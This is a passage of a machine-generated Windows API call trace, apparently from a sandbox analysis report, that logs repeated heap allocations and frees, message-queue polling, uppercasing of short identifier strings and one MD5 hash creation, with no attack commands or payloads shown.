hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0260.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0260.875] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0260.875] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0260.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0260.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0260.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0260.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0260.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0260.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0260.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0260.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0260.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.876] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0260.877] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0260.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0260.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0260.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0260.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0260.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0260.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0260.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0260.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0260.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0260.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0260.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0260.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0260.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0260.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0260.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0260.878] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0260.878] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0260.878] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0260.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0260.878] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0260.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0260.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0260.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0260.879] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0260.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.879] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.880] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.880] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.880] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0260.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.880] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0260.880] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0260.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.880] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0260.880] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.880] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0260.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0260.881] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.881] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0260.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0260.881] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.881] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.881] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0260.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0260.881] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.882] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0260.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.882] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0260.882] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0260.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0260.882] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0260.882] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.882] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0260.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0260.882] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.882] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.883] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0260.883] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0260.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0260.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0260.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0260.883] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.883] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0260.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.883] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.883] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.883] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0260.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.884] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0260.884] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0260.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0260.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0260.884] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0260.884] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.884] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0260.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0260.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0260.885] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0260.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0260.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0260.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0260.885] CryptCreateHash (in: hProv=0xad31c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0260.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0260.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0260.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0260.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0260.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0260.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0260.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0260.885] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0260.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0260.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0260.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0260.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0260.886] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.886] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0260.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0260.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0260.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0260.886] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, 